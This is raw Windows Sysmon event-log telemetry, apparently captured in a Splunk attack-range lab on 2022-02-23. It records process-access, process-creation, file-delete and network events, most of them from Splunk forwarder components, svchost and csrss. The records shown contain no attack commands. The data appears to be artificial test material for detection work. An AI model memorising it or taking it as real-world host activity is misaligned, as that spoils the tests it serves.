+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1AAD-6216-6F05-000000003902}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.378{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AAD-6216-6F05-000000003902}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.379{4F8D34B0-1AAD-6216-6F05-000000003902}1500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:49.160{4F8D34B0-1AAC-6216-6E05-000000003902}35202544C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000223677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:50.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77BF4DCAD28736B7281FAB1DB765D80B,SHA256=10ED755E4C815DFA777AF89382F80A95BEEA7000A5E017696E8BCD5D912C8D36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:50.489{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7D701CF6EBAE363DC25E77228C51C59,SHA256=18BEFB8757C217E762D9B7502A107CCB7250BF4DF381AEF7A472ECDBE65B26A1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:47.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51801-false10.0.1.12-8000- 23542300x8000000000000000299870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:51.508{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F91C5BF1528C422D8161FB9D9E5D15,SHA256=BB399852D1BB867439AAD5CC0F9082371BED0B996F67A105AB85114EBFF87A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.534{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61468CD9A77B8C5D45DCCE3CA8C2C85,SHA256=FE4AEDCA694A5B40A7F355E5CE799ECEDA605E42D240AA2EDCAB1D6B66F5B706,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AAF-6216-7005-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1AAF-6216-7005-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.315{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1AAF-6216-7005-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:51.316{4F8D34B0-1AAF-6216-7005-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:52.508{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C27486AB3955262A241906B2426FE1F,SHA256=8ABF50C5B02B065B895EBBFAD7E283945563CC13E4E6D36F9222BA66DE733EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:52.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DC717D554B08B84FFA2EC9E9B972D5C,SHA256=05E7C7E8B0BD7E29A48EDAA51E6B8BFC9F8D5B35844653EF013F3EEE28E1736A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:52.347{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6730BB07F63AF5A9E35B9DBE36B650F7,SHA256=0D8C5723C0491DAA779DB20780E6EC64D3E74D2C85509D4406AFE43E996E3D08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:53.509{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFC368E71095ED5433E00118C2FFEBC6,SHA256=7F6CF8D69BB0498CB674CB757C16417C0E2968DBED99C24A053F3C67E6467E7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:53.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71274AAE63004EA26F76554F2E996C79,SHA256=77046DCACC1D4AFDF6185C75E3AE957BD2750328D9CA298A463C96EC9470D89B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:53.470{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:53.470{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 